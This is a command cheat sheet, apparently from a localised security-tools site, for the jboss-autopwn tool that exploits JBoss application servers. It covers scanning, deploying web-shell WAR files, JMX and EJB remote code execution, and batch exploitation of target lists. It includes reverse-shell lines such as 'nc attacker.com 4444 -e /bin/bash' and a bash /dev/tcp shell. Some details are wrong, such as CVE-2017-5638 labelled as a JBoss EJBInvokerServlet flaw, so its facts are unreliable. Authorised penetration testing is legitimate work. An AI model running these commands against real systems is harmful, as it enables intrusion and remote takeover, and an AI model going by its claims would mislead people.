콘텐츠로 이동
1337skills 1337skills - 치트시트

jboss-autopwn

Overview

섹션 제목: “Overview”

jboss-autopwn is a JBoss Application Server exploitation tool designed for security professionals to automate the discovery and exploitation of known JBoss vulnerabilities. It facilitates rapid vulnerability assessment and verification of JBoss AS security posture during authorized penetration tests.

The tool supports multiple JBoss versions and provides automated exploitation capabilities for common misconfigurations and known CVEs affecting JBoss AS deployments.

Installation

섹션 제목: “Installation”

Prerequisites

섹션 제목: “Prerequisites”
  • Python 2.7+ or Python 3.x
  • Git
  • JBoss AS instance (for testing)
  • Proper authorization and scope approval

Installation Steps

섹션 제목: “Installation Steps”
# Clone the repository
git clone https://github.com/SecurityBegins/jboss-autopwn.git
cd jboss-autopwn

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x jboss-autopwn.py

# Verify installation
python jboss-autopwn.py --help

Docker Installation

섹션 제목: “Docker Installation”
# Build Docker image
docker build -t jboss-autopwn .

# Run in container
docker run -it jboss-autopwn python jboss-autopwn.py --help

Basic Usage

섹션 제목: “Basic Usage”

Syntax

섹션 제목: “Syntax”
python jboss-autopwn.py [OPTIONS] -t <target>

Common Options

섹션 제목: “Common Options”
OptionDescription
-t, --targetTarget JBoss URL (http://host:port)
-p, --portPort number (default: 8080)
-u, --usernameJBoss admin username
-P, --passwordJBoss admin password
--exploitSpecific exploit to run
-f, --filePayload file for upload
-v, --verboseVerbose output
-h, --helpDisplay help message

Common Commands

섹션 제목: “Common Commands”

Target Discovery and Probing

섹션 제목: “Target Discovery and Probing”
# Basic target scanning
python jboss-autopwn.py -t http://192.168.1.100:8080

# Scan with custom port
python jboss-autopwn.py -t 192.168.1.100 -p 8090

# Verbose output for debugging
python jboss-autopwn.py -t http://target.com:8080 -v

# Scan entire subnet
python jboss-autopwn.py -t http://192.168.1.0/24 -p 8080

Version Detection

섹션 제목: “Version Detection”
# Detect JBoss version
python jboss-autopwn.py -t http://target.com:8080 --version

# Check for specific vulnerability
python jboss-autopwn.py -t http://target.com:8080 --check-cve CVE-2017-12149

# List detected vulnerabilities
python jboss-autopwn.py -t http://target.com:8080 --list-vulns

Exploitation Techniques

섹션 제목: “Exploitation Techniques”
# Auto-exploit detected vulnerabilities
python jboss-autopwn.py -t http://target.com:8080 --auto-exploit

# Exploit with reverse shell
python jboss-autopwn.py -t http://target.com:8080 --exploit shell \
  --lhost 192.168.1.50 --lport 4444

# Upload malicious WAR file
python jboss-autopwn.py -t http://target.com:8080 \
  -f malicious.war --deploy

# Execute system command
python jboss-autopwn.py -t http://target.com:8080 \
  --cmd "whoami" --execute

Authenticated Exploitation

섹션 제목: “Authenticated Exploitation”
# Connect with credentials
python jboss-autopwn.py -t http://target.com:8080 \
  -u admin -P password123 --exploit

# Use provided credentials for JMX
python jboss-autopwn.py -t http://target.com:8080 \
  --jmx-user admin --jmx-pass password123 \
  --jmx-exploit

Exploit Types

섹션 제목: “Exploit Types”

WAR Deployment Exploits

섹션 제목: “WAR Deployment Exploits”
# Generate web shell WAR
python jboss-autopwn.py -t http://target.com:8080 \
  --generate-war shell.war

# Deploy WAR directly
python jboss-autopwn.py -t http://target.com:8080 \
  -f shell.war --direct-deploy

# Access deployed application
curl http://target.com:8080/shell/

JMX Exploitation

섹션 제목: “JMX Exploitation”
# Exploit JMX service
python jboss-autopwn.py -t http://target.com:8080 \
  --jmx-service --jmx-port 4447

# Create malicious MBean
python jboss-autopwn.py -t http://target.com:8080 \
  --create-mbean --bean-class PayloadClass

EJB Invocation

섹션 제목: “EJB Invocation”
# Invoke EJB methods
python jboss-autopwn.py -t http://target.com:8080 \
  --invoke-ejb -b TargetEJB

# Remote method execution via EJB
python jboss-autopwn.py -t http://target.com:8080 \
  --ejb-rce --method-name execute

Advanced Configuration

섹션 제목: “Advanced Configuration”

Custom Payload Creation

섹션 제목: “Custom Payload Creation”
# Create custom Java deserialization payload
python jboss-autopwn.py --generate-payload \
  --payload-type java-deser \
  --command "nc attacker.com 4444 -e /bin/bash"

# Generate ysoserial payload
python jboss-autopwn.py --payload-generator ysoserial \
  --gadget CommonsCollections5 \
  --command "touch /tmp/pwned"

Session Configuration

섹션 제목: “Session Configuration”
# Save configuration for repeated use
cat > jboss-config.txt << EOF
target=http://192.168.1.100:8080
port=8080
username=admin
password=admin123
timeout=30
retries=3
EOF

# Use configuration file
python jboss-autopwn.py -c jboss-config.txt

Multi-Target Scanning

섹션 제목: “Multi-Target Scanning”
# Create targets file
cat > targets.txt << EOF
http://192.168.1.100:8080
http://192.168.1.101:8080
http://target.example.com:8080
EOF

# Scan multiple targets
python jboss-autopwn.py -f targets.txt --batch-mode

# Batch exploitation
python jboss-autopwn.py -f targets.txt --exploit --log-results

Vulnerability Assessment

섹션 제목: “Vulnerability Assessment”

Known JBoss Vulnerabilities

섹션 제목: “Known JBoss Vulnerabilities”
# Check CVE-2017-12149 (Deserialization RCE)
python jboss-autopwn.py -t http://target.com:8080 \
  --check-cve CVE-2017-12149

# Check CVE-2017-5638 (EJBInvokerServlet)
python jboss-autopwn.py -t http://target.com:8080 \
  --check-cve CVE-2017-5638

# Comprehensive vulnerability scan
python jboss-autopwn.py -t http://target.com:8080 \
  --full-scan --report vulnerability-report.html

Output and Reporting

섹션 제목: “Output and Reporting”

Generate Reports

섹션 제목: “Generate Reports”
# HTML report generation
python jboss-autopwn.py -t http://target.com:8080 \
  --full-scan --html-report report.html

# JSON output for automation
python jboss-autopwn.py -t http://target.com:8080 \
  --output-json results.json

# CSV export for analysis
python jboss-autopwn.py -t http://target.com:8080 \
  --output-csv results.csv

Logging and Monitoring

섹션 제목: “Logging and Monitoring”
# Enable detailed logging
python jboss-autopwn.py -t http://target.com:8080 \
  -v --log-file audit.log

# Real-time output
python jboss-autopwn.py -t http://target.com:8080 \
  --real-time-output

# Save session transcript
python jboss-autopwn.py -t http://target.com:8080 \
  --transcript session.txt

Reverse Shell and Post-Exploitation

섹션 제목: “Reverse Shell and Post-Exploitation”

Establishing Command Shells

섹션 제목: “Establishing Command Shells”
# Reverse shell with Netcat listener
# Attacker machine:
nc -lvnp 4444

# jboss-autopwn command:
python jboss-autopwn.py -t http://target.com:8080 \
  --reverse-shell --lhost 192.168.1.50 --lport 4444

# Bash reverse shell
python jboss-autopwn.py -t http://target.com:8080 \
  --cmd "bash -i >& /dev/tcp/192.168.1.50/4444 0>&1"

Interactive Shell Access

섹션 제목: “Interactive Shell Access”
# Start interactive shell mode
python jboss-autopwn.py -t http://target.com:8080 \
  --interactive-shell

# Execute commands interactively
jboss> whoami
jboss> id
jboss> ls -la /opt/jboss

Best Practices

섹션 제목: “Best Practices”

Pre-Exploitation Checklist

섹션 제목: “Pre-Exploitation Checklist”
  • Verify scope and obtain written authorization
  • Document target system details and baseline
  • Test tools on isolated lab environments first
  • Prepare incident response procedures
  • Establish clear communication channels
  • Maintain detailed activity logs
  • Create backup snapshots before testing

Safe Testing Guidelines

섹션 제목: “Safe Testing Guidelines”
# Dry-run mode (show what would happen without executing)
python jboss-autopwn.py -t http://target.com:8080 \
  --dry-run --verbose

# Test on development instance first
python jboss-autopwn.py -t http://dev-jboss.internal:8080 \
  --safe-mode

# Validate payload before deployment
python jboss-autopwn.py --validate-payload test.war

Troubleshooting

섹션 제목: “Troubleshooting”

Connection Issues

섹션 제목: “Connection Issues”
# Test connectivity
python jboss-autopwn.py -t http://target.com:8080 \
  --test-connection --verbose

# Check proxy settings
python jboss-autopwn.py -t http://target.com:8080 \
  --proxy http://proxy.internal:8080 \
  --proxy-user username --proxy-pass password

# SSL/TLS verification
python jboss-autopwn.py -t https://target.com:8443 \
  --ignore-ssl-warnings

Common Errors and Solutions

섹션 제목: “Common Errors and Solutions”
ErrorSolution
Connection timeoutVerify target is online, check firewall rules, adjust timeout
Authentication failedVerify credentials, check account lockout status
Version detection failedTry manual version specification with --version
Payload upload failedCheck file permissions, verify WAR format, check disk space
RCE not workingTry different gadget chains, verify Java version compatibility

Debug Mode

섹션 제목: “Debug Mode”
# Maximum verbosity
python jboss-autopwn.py -t http://target.com:8080 \
  -vvv --debug --log-level DEBUG

# Packet capture
python jboss-autopwn.py -t http://target.com:8080 \
  --tcpdump --pcap-file traffic.pcap

# Python traceback on error
python jboss-autopwn.py -t http://target.com:8080 \
  --verbose --traceback
섹션 제목: “Legal and Ethical Considerations”
  • Only use jboss-autopwn on systems you own or have explicit written authorization to test
  • Obtain proper approval from system owners and stakeholders before testing
  • Follow responsible disclosure procedures for discovered vulnerabilities
  • Maintain confidentiality of security assessment results
  • Document all activities for compliance and audit purposes
  • Use only for authorized penetration testing and vulnerability assessment
  • Comply with all applicable laws and regulations in your jurisdiction

Resources and References

섹션 제목: “Resources and References”

See Also

섹션 제목: “See Also”
  • Metasploit Framework JBoss modules
  • Custom exploitation development techniques
  • Java deserialization exploitation
  • WAR file structure and deployment